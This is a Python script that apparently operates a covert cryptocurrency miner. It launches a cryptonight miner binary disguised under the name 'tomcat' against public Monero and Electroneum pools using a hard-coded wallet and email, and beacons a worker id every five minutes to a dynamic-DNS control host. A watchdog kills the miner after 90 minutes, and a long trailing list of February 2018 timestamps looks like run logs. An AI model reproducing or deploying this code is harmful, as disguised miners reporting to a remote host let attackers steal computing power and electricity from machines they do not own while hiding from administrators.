import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:11:03.475055
#2018-02-17 16:59:02.201016
#2018-02-17 18:47:03.929798
#2018-02-17 20:34:07.406926
#2018-02-17 22:20:06.547950
#2018-02-18 00:04:05.308170
#2018-02-18 01:55:04.052250
#2018-02-18 03:43:02.003422
#2018-02-18 05:30:09.724088
#2018-02-18 07:22:01.607210
#2018-02-18 09:10:03.798722
#2018-02-18 10:56:05.974184
#2018-02-18 12:44:05.246089
#2018-02-18 14:30:10.032720
#2018-02-18 16:20:08.253412
#2018-02-18 18:09:03.530172
#2018-02-18 19:55:01.641822
#2018-02-18 21:41:04.934832
#2018-02-18 23:29:03.130470
#2018-02-19 01:16:03.568369
#2018-02-19 03:02:05.354600
#2018-02-19 04:48:01.321965
#2018-02-19 06:34:04.111419
#2018-02-19 08:23:08.222923
#2018-02-19 10:13:04.531203
#2018-02-19 12:00:11.834524
#2018-02-19 13:47:01.736893
#2018-02-19 15:35:10.392171
#2018-02-19 17:22:07.526151
#2018-02-19 19:11:07.887018
#2018-02-19 20:59:05.254146
#2018-02-19 22:47:01.507863
#2018-02-20 00:32:04.900264
#2018-02-20 02:21:03.686088
#2018-02-20 04:11:04.571202
#2018-02-20 05:54:03.619362
#2018-02-20 07:40:05.829979
#2018-02-20 09:24:08.975147
#2018-02-20 11:08:09.444643
#2018-02-20 12:55:07.295000
#2018-02-20 14:40:05.173171
#2018-02-20 16:24:11.116576
#2018-02-20 18:12:10.989211
#2018-02-20 20:03:04.605063
#2018-02-20 21:51:05.786608
#2018-02-20 23:34:04.055403
#2018-02-21 01:18:06.179411
#2018-02-21 03:05:04.984219
#2018-02-21 04:51:07.156232
#2018-02-21 06:39:03.824097
#2018-02-21 08:24:05.700043
#2018-02-21 10:09:06.911593
#2018-02-21 11:58:01.382387
#2018-02-21 13:48:06.572796
#2018-02-21 15:34:08.933801
#2018-02-21 17:26:05.516380
#2018-02-21 19:13:05.147259
#2018-02-21 21:03:04.352055
#2018-02-21 22:49:06.158647
#2018-02-22 00:39:01.905174
#2018-02-22 02:27:01.241226
#2018-02-22 04:14:01.579035
#2018-02-22 05:58:05.974425
#2018-02-22 07:44:05.652515
#2018-02-22 09:33:01.862094
#2018-02-22 11:19:10.301564
#2018-02-22 13:05:09.594365
#2018-02-22 14:52:07.287839
#2018-02-22 16:38:11.407947
#2018-02-22 18:24:01.642941
#2018-02-22 20:19:04.131127
#2018-02-22 22:05:05.151701
#2018-02-22 23:53:01.284984
#2018-02-23 01:40:07.115364
#2018-02-23 03:28:01.384801
#2018-02-23 05:14:06.544849
#2018-02-23 06:59:06.723489
#2018-02-23 08:49:02.151741
#2018-02-23 11:10:04.864147
#2018-02-23 13:04:03.992115
#2018-02-23 14:49:05.337823
#2018-02-23 16:38:09.387132
#2018-02-23 18:25:04.133164
#2018-02-23 20:11:08.120841
#2018-02-23 22:00:11.788347
#2018-02-23 23:49:01.946075
#2018-02-24 01:36:01.807550
#2018-02-24 03:24:05.577920
#2018-02-24 05:10:01.997064
#2018-02-24 06:59:03.564395
#2018-02-24 08:50:02.008242
#2018-02-24 10:49:01.988537
#2018-02-24 12:36:07.588968
#2018-02-24 14:25:08.476503
#2018-02-24 16:13:05.700733
#2018-02-24 18:06:04.819418
#2018-02-24 19:52:01.768479
#2018-02-24 21:37:01.645610
#2018-02-25 00:26:04.795734
#2018-02-25 03:31:05.186235
#2018-02-25 07:20:07.656824